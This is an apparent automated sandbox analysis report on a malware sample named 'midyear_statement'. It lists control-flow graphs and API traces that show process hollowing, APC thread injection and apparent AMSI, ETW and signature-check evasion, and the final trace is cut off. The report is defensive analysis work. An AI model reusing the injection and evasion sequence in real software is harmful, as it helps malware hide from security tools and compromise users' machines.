40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40bd070 call 40a44c4 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4d50 * 2 call 40a46f8 call 40bcd1c 4853->5112 4862->4863 4965 40c6a1c-40c6d3c call 40a4968 call 40bcee0 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40bc20c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 4863->4965 4966 40c6a17-40c6a1a 4863->4966 5279 40c6d3e-40c6d50 NtQueueApcThread 4965->5279 5280 40c6d55-40c72ba call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 ResumeThread call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 CloseHandle call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 4965->5280 4966->4965 5111->4846 5112->5111 5279->5280 5280->4754
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,041F4798,041F47DC,OpenSession,04100344,040C9768,UacScan,04100344), ref: 040C6885
                                                                                                                                                                                          • NtQueueApcThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,UacScan,04100344,040C9768,ScanBuffer,04100344), ref: 040C6D50
                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,UacScan,04100344,040C9768,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768), ref: 040C6ECF
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,UacScan,04100344,040C9768,00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344), ref: 040C704E
                                                                                                                                                                                            • Part of subcall function 040A7DD4: GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
                                                                                                                                                                                            • Part of subcall function 040BCD1C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,ScanBuffer,04100344,040C9768,Initialize,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,OpenSession,04100344,040C9768), ref: 040C9301
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandlePathProcessThread$AddressAttributesExitLibraryLoadModuleNameName_ProcQueueResumeUserWrite
                                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                          • API String ID: 2601453139-4169187149
                                                                                                                                                                                          • Opcode ID: 19bf158adfb86830e3e9908d9f3f189ad8a195967712c054973a998f4a66aa91
                                                                                                                                                                                          • Instruction ID: e4a93a957eddac958dbb963bbf766e4d939d24a6b4e1bcb0a8f6fded2960db71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19bf158adfb86830e3e9908d9f3f189ad8a195967712c054973a998f4a66aa91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5943F939A41119CFEB14EBA4D880DCEB3B9EF8570CF5546E5A008BB610DB74BEA58F41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B7EE8 Relevance: 41.9, APIs: 8, Strings: 15, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 9105 40b7ee8-40b7eeb 9106 40b7ef0-40b7ef5 9105->9106 9106->9106 9107 40b7ef7-40b7fde call 40a4900 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9106->9107 9138 40b994b-40b99b5 call 40a4494 * 2 call 40a4bd0 call 40a4494 call 40a4470 call 40a4494 * 2 9107->9138 9139 40b7fe4-40b80bf call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9107->9139 9139->9138 9183 40b80c5-40b83ed call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a3098 * 2 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4d50 call 40a4d60 CreateProcessAsUserW 9139->9183 9290 40b83ef-40b845b call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9183->9290 9291 40b8460-40b8786 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a2ee0 call 40a2f08 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 GetThreadContext 9183->9291 9290->9291 9291->9138 9399 40b878c-40b89ef call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtReadVirtualMemory 9291->9399 9470 40b8cfc-40b8d68 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9399->9470 9471 40b89f5-40b8b5e call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtUnmapViewOfSection 9399->9471 9498 40b8d6d-40b8eed call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b78f8 9470->9498 9556 40b8b88-40b8bf4 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9471->9556 9557 40b8b60-40b8b86 call 40b78f8 9471->9557 9498->9138 9603 40b8ef3-40b8fec call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b7df8 9498->9603 9566 40b8bf9-40b8cfa call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b78f8 9556->9566 9557->9566 9566->9498 9651 40b8fee-40b903b call 40b7cf0 call 40b7ce4 9603->9651 9652 40b9040-40b9946 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtWriteVirtualMemory call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtWriteVirtualMemory call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 SetThreadContext NtResumeThread call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a2c2c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b7a50 * 3 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b7a50 * 2 call 40a47d0 call 40a4910 call 40a475c call 40a4910 call 40b7a50 call 40a47d0 call 40a4910 call 40a475c call 40a4910 call 40b7a50 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9603->9652 9651->9652 9652->9138
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,04100398,04100388,OpenSession,04100360,040B99D0,ScanString,04100360), ref: 040B83E6
                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000868,041003DC,ScanString,04100360,040B99D0,UacInitialize,04100360,040B99D0,ScanBuffer,04100360,040B99D0,ScanBuffer,04100360,040B99D0,UacInitialize,04100360), ref: 040B877F
                                                                                                                                                                                          • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B0,00000004,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360), ref: 040B89DC
                                                                                                                                                                                          • NtUnmapViewOfSection.N(00000894,00590000,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B0,00000004,041004B8), ref: 040B8B57
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                            • Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00590000,00000000,11D95300,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,ScanBuffer,04100360), ref: 040B91AB
                                                                                                                                                                                          • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B4,00000004,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00590000), ref: 040B931E
                                                                                                                                                                                          • SetThreadContext.KERNEL32(00000868,041003DC,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B4,00000004,041004B8), ref: 040B9494
                                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000868,00000000,00000868,041003DC,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B4), ref: 040B94A1
                                                                                                                                                                                            • Part of subcall function 040B7A50: LoadLibraryW.KERNEL32(bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC,ScanString,04100360,040B99D0), ref: 040B7A62
                                                                                                                                                                                            • Part of subcall function 040B7A50: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040B7A6F
                                                                                                                                                                                            • Part of subcall function 040B7A50: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize), ref: 040B7A86
                                                                                                                                                                                            • Part of subcall function 040B7A50: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC), ref: 040B7A95
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                          • API String ID: 2533507481-2367850715
                                                                                                                                                                                          • Opcode ID: aee14c98fb3a47aa7bb174f0abd6dfee168f2edd272fad84fcbc7b245bb5a4f3
                                                                                                                                                                                          • Instruction ID: b591209a81686d2ed736725af0fb2b1ca598fddfcaaf4bda5a88676f04f68113
                                                                                                                                                                                          • Opcode Fuzzy Hash: aee14c98fb3a47aa7bb174f0abd6dfee168f2edd272fad84fcbc7b245bb5a4f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0E21239A411189FEB51EBA4DC80FCEB3B9AF4560CF1041A29148BB614DBB0FE95CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B7EE6 Relevance: 41.8, APIs: 8, Strings: 15, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 9925 40b7ee6-40b7eeb 9927 40b7ef0-40b7ef5 9925->9927 9927->9927 9928 40b7ef7-40b7fde call 40a4900 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9927->9928 9959 40b994b-40b99b5 call 40a4494 * 2 call 40a4bd0 call 40a4494 call 40a4470 call 40a4494 * 2 9928->9959 9960 40b7fe4-40b80bf call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 9928->9960 9960->9959 10004 40b80c5-40b83ed call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a3098 * 2 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4d50 call 40a4d60 CreateProcessAsUserW 9960->10004 10111 40b83ef-40b845b call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 10004->10111 10112 40b8460-40b8786 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a2ee0 call 40a2f08 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 GetThreadContext 10004->10112 10111->10112 10112->9959 10220 40b878c-40b89ef call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtReadVirtualMemory 10112->10220 10291 40b8cfc-40b8d68 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 10220->10291 10292 40b89f5-40b8b5e call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtUnmapViewOfSection 10220->10292 10319 40b8d6d-40b8eed call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b78f8 10291->10319 10377 40b8b88-40b8bf4 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 10292->10377 10378 40b8b60-40b8b86 call 40b78f8 10292->10378 10319->9959 10424 40b8ef3-40b8fec call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b7df8 10319->10424 10387 40b8bf9-40b8cfa call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b78f8 10377->10387 10378->10387 10387->10319 10472 40b8fee-40b903b call 40b7cf0 call 40b7ce4 10424->10472 10473 40b9040-40b9946 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtWriteVirtualMemory call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 NtWriteVirtualMemory call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 SetThreadContext NtResumeThread call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a2c2c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b7a50 * 3 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40b7a50 * 2 call 40a47d0 call 40a4910 call 40a475c call 40a4910 call 40b7a50 call 40a47d0 call 40a4910 call 40a475c call 40a4910 call 40b7a50 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 10424->10473 10472->10473 10473->9959
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,04100398,04100388,OpenSession,04100360,040B99D0,ScanString,04100360), ref: 040B83E6
                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000868,041003DC,ScanString,04100360,040B99D0,UacInitialize,04100360,040B99D0,ScanBuffer,04100360,040B99D0,ScanBuffer,04100360,040B99D0,UacInitialize,04100360), ref: 040B877F
                                                                                                                                                                                          • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B0,00000004,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360), ref: 040B89DC
